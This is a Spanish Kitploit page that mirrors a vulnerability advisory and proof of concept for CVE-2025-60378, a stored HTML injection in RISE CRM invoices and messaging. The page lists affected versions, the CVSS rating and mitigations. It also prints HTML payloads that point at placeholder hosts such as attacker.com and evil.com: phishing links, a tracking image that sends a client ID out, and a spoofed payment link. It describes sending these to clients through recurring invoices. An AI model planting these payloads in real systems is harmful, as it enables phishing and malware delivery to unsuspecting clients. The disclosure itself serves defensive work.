Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-60378 — Prueba de concepto para la inyección de HTML almacenada en RISE CRM, que demuestra cómo los usuarios autenticados pueden inyectar HTML malicioso en facturas y mensajes, lo que conduce a phishing y distribución de malware a través de correos electrónicos y PDFs automatizados. | Kitploit
Herramientas/GitHubGitHub/ajansha/cve-2025-60378
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPhishingSeguridad WebAprendizaje y Educación
GitHubajansha/cve-2025-60378

CVE-2025-60378

Prueba de concepto para la inyección de HTML almacenada en RISE CRM, que demuestra cómo los usuarios autenticados pueden inyectar HTML malicioso en facturas y mensajes, lo que conduce a phishing y distribución de malware a través de correos electrónicos y PDFs automatizados.

Ver Repositorio
hace 10 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-60378: Inyección de HTML Almacenado en RISE Ultimate Project Manager & CRM

⚠️ Aviso de Seguridad
Una vulnerabilidad crítica de inyección de HTML almacenado que afecta a facturas, mensajería y comunicaciones automatizadas

CVE Severity CVSS Product


📋 Resumen

Se ha descubierto una vulnerabilidad crítica de inyección de HTML almacenado en RISE Ultimate Project Manager & CRM que permite a usuarios autenticados inyectar HTML malicioso en partidas de facturas, notas de clientes y módulos de mensajería. Este contenido inyectado persiste en la base de datos y se renderiza automáticamente en correos electrónicos dirigidos a clientes, PDFs y comunicaciones de chat, lo que permite ataques de phishing a gran escala, compromiso de correo empresarial y entrega de malware mediante correo electrónico/PDF.

🎯 Versiones Afectadas

  • Producto: RISE - Ultimate Project Manager & CRM
  • Versiones Vulnerables: < 3.9.4
  • Versión Corregida: 3.9.4+

🔍 Detalles de la Vulnerabilidad

AtributoValor
ID CVECVE-2025-60378
TipoInyección de HTML Almacenado
CWECWE-79
Vector de AtaqueRed/Remoto
AutenticaciónRequerida (Privilegios Bajos)
Interacción del UsuarioNinguna
SeveridadALTA
CVSS v3.18.1 - Alta
DescubridorAjansha Shankar

Descripción

RISE CRM no sanea ni codifica adecuadamente el contenido HTML en múltiples campos editables por el usuario, incluyendo facturas, mensajes y notas de clientes. Cuando usuarios autenticados inyectan cargas útiles HTML en estos campos, el contenido se almacena en la base de datos sin un filtrado adecuado. Posteriormente, este HTML malicioso se renderiza automáticamente en correos electrónicos dirigidos a clientes, archivos PDF adjuntos y módulos de mensajería/chat sin el escape adecuado. Las facturas recurrentes y la mensajería automatizada amplifican el ataque al distribuir contenido malicioso a múltiples destinatarios simultáneamente.

Componentes Afectados

  • ✗ Partidas de facturas (campo de descripción)
  • ✗ Módulo de notas/mensajería de clientes
  • ✗ Sistema de chat y mensajería
  • ✗ Módulo de generación de estados de cuenta de clientes
  • ✗ Sistema de correo electrónico automatizado (facturas recurrentes, recordatorios)
  • ✗ Archivos PDF adjuntos

Causa Raíz

  • ❌ Saneamiento insuficiente de entradas en campos de facturas, mensajes y notas de clientes
  • ❌ Falta de codificación de salida HTML en plantillas de correo electrónico y generación de PDF
  • ❌ Sin validación de contenido antes de almacenar en la base de datos
  • ❌ Falta de restricciones sobre HTML/JavaScript en comunicaciones con clientes
  • ❌ Los sistemas automatizados distribuyen contenido no validado sin filtrado adicional

💥 Impacto

Implicaciones de Seguridad

  • 🎣 Phishing a Gran Escala: El contenido inyectado puede suplantar comunicaciones legítimas y redirigir a múltiples clientes a sitios controlados por el atacante
  • 💼 Compromiso de Correo Empresarial: Facturas y mensajes maliciosos enviados a clientes parecen provenir de una fuente confiable
  • 💬 Mensajería Comprometida: Las cargas útiles maliciosas en chat/mensajería llegan directamente a miembros del equipo y clientes
  • 🦠 Distribución de Malware: Enlaces maliciosos incrustados o iframes entregan malware mediante correo electrónico/PDF/mensajería
  • 🔄 Distribución Automatizada de Ataques: Las facturas recurrentes y mensajes automatizados aseguran que la carga útil llegue a múltiples destinatarios sin intervención manual
  • 👥 Ataque Multi-Vector: La combinación de superficies de ataque por correo electrónico, PDF y mensajería aumenta la tasa de compromiso exitoso

Evaluación de la Tríada CIA

FactorImpactoExplicación
Confidencialidad🔴 ALTALas credenciales de clientes y datos sensibles pueden ser recolectados mediante phishing
Integridad🔴 ALTAEl contenido malicioso puede modificar la percepción de las comunicaciones y relaciones comerciales
Disponibilidad🟡 BAJAImpacto directo limitado en la disponibilidad del sistema

Escenarios de Ataque en el Mundo Real

Escenario 1: Campaña de Phishing Basada en Facturas

Un atacante con acceso de gerente de proyecto de bajos privilegios crea una factura con HTML malicioso:

root@kitploit:~
<a href="https://attacker.com/fake-payment">Haga clic aquí para ver el estado del pago</a>

La factura se envía a más de 100 clientes mediante correo electrónico automatizado. Todos los clientes reciben lo que parece ser una factura legítima que los dirige a un sitio de phishing. El atacante recolecta credenciales de múltiples víctimas simultáneamente.

Escenario 2: Ataque Basado en Mensajería

Un atacante inyecta HTML malicioso en un mensaje de cliente:

root@kitploit:~
<img src="https://attacker.com/track.gif?user=CLIENT_ID">
<a href="https://malware.com">Descargar Archivos de Proyecto Actualizados</a>

Todos los miembros del equipo y clientes reciben el mensaje en su chat, haciendo clic en enlaces para descargar malware.

Escenario 3: Entrega de Malware mediante Facturas Recurrentes

Un atacante configura una factura recurrente con una carga útil de entrega de malware. Cada mes, los clientes reciben automáticamente facturas con contenido malicioso incrustado, proporcionando un vector de ataque persistente.

🧪 Prueba de Concepto

Configuración del Entorno

  • Acceso al panel de administración de RISE CRM con permisos de creación de facturas/mensajes
  • Cualquier versión anterior a 3.9.4

Pasos de la PoC

Paso 1: Acceder a la Creación de Facturas o Mensajes

root@kitploit:~
Navegar a: Panel de RISE CRM → Facturas/Mensajes → Crear Nuevo

Paso 2: Inyectar Carga Útil HTML en el Campo de Descripción/Mensaje

root@kitploit:~
<a href="https://attacker.com">Haga clic aquí para ver la factura</a>

Paso 3: Añadir Imagen Maliciosa con Redirección

root@kitploit:~
<a href="https://evil.com" target="_blank">
  <img src="https://media1.giphy.com/media/v1.Y2lkPTc5MGI3NjExbzg4OXRuZHd4MXF0bWNqa3BvN2pzbWdqMzRxZHc5bHJpbXpucHNtaSZlcD12MV9pbnRlcm5hbF9naWZfYnlfaWQmY3Q9Zw/9PgvV8ale90lQwfQTZ/giphy.gif">
</a>

Paso 4: Añadir Carga Útil de Estilo Engañoso

root@kitploit:~
<h1><font color=red>Visite Nuestro Nuevo Sitio Web</font></h1>
<h3><mark><a href="https://evil.com">https://www.paytm.com/</a></mark></h3>

Paso 5: Configurar Distribución Recurrente

  • Guardar el registro
  • Habilitar la opción "Recurrente" (si está disponible para facturas/mensajes)
  • Configurar la frecuencia (semanal, mensual, etc.)
  • El sistema envía automáticamente a todos los clientes relevantes

Paso 6: Verificar el Vector de Ataque

  • Revisar la bandeja de entrada del correo del cliente
  • Revisar la mensajería/chat del cliente
  • Abrir el archivo PDF adjunto
  • Observar el HTML malicioso renderizado en todos los canales

Resultado Esperado

✅ El HTML inyectado se renderiza en correos electrónicos, PDFs y mensajería sin escape ✅ Los enlaces son clicables y redirigen a sitios del atacante ✅ Las imágenes se cargan desde servidores controlados por el atacante ✅ El contenido persiste en todas las comunicaciones futuras con clientes ✅ La distribución recurrente llega a múltiples destinatarios automáticamente

🛡️ Mitigación

Para Usuarios Finales

  1. ✅ Actualizar Inmediatamente: Actualizar a RISE CRM v3.9.4 o posterior
  2. 🔍 Auditar Todos los Registros: Revisar facturas, mensajes y notas de clientes recientes en busca de contenido HTML sospechoso
  3. ⚠️ Notificación a Clientes: Alertar a todos los clientes si se enviaron facturas o mensajes sospechosos
  4. 🔄 Restablecimiento de Credenciales: Recomendar a los clientes cambiar sus contraseñas si hicieron clic en enlaces
  5. 📝 Monitorear Actividad: Revisar registros de auditoría en busca de modificaciones no autorizadas de facturas/mensajes
  6. 🔐 Deshabilitar Recurrentes: Deshabilitar temporalmente facturas/mensajes recurrentes hasta que se aplique el parche

📚 Referencias

  • CWE-79: Neutralización Inadecuada de Entradas Durante la Generación de Páginas Web
  • OWASP: Cross-site Scripting (XSS)
  • OWASP: Inyección de HTML
  • OWASP: Codificación de Salida
  • Entrada Oficial CVE-2025-60378

📅 Cronología

FechaEvento
TBDVulnerabilidad descubierta
TBDProveedor notificado
TBDCVE-2025-60378 asignado
TBDParche publicado (v3.9.4)
TBDDivulgación pública

👤 Créditos

Descubierto por: Ajansha Shankar

LinkedIn: https://www.linkedin.com/in/ajansha-shankar/

📊 Evaluación CVSS v3.1

Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N

Puntuación: 8.1 (ALTA)

Desglose:

  • Vector de Ataque (AV:N): Red - Puede explotarse remotamente
  • Complejidad de Ataque (AC:L): Baja - No se requieren condiciones especiales
  • Privilegios Requeridos (PR:L): Bajos - Requiere usuario autenticado con privilegios básicos de gerente de proyecto
  • Interacción del Usuario (UI:N): Ninguna - No se necesita interacción del usuario; los sistemas automatizados distribuyen la carga útil
  • Alcance (S:U): Sin cambios - El impacto se limita al componente vulnerable
  • Confidencialidad (C:H): Alta - Posible robo de credenciales mediante phishing a múltiples clientes
  • Integridad (I:H): Alta - Se puede inyectar y entregar contenido malicioso a múltiples destinatarios
  • Disponibilidad (A:N): Ninguna - Sin impacto en la disponibilidad del sistema

📧 Contacto

Para preguntas o información adicional:

  • LinkedIn: https://www.linkedin.com/in/ajansha-shankar/

⭐ Si esta investigación fue útil, ¡considera dar una estrella a este repositorio!

🔔 Mantente actualizado: Observa este repositorio para actualizaciones sobre esta y futuras investigaciones de seguridad.

  • CVE-2025-60374 - XSS Almacenado en Perfex CRM Chatbot
  • CVE-2025-55903 - Inyección de HTML Almacenado en Facturas de Perfex CRM
  • CVE-2025-60375 - Bypass de Autenticación en Perfex CRM
Descargar herramienta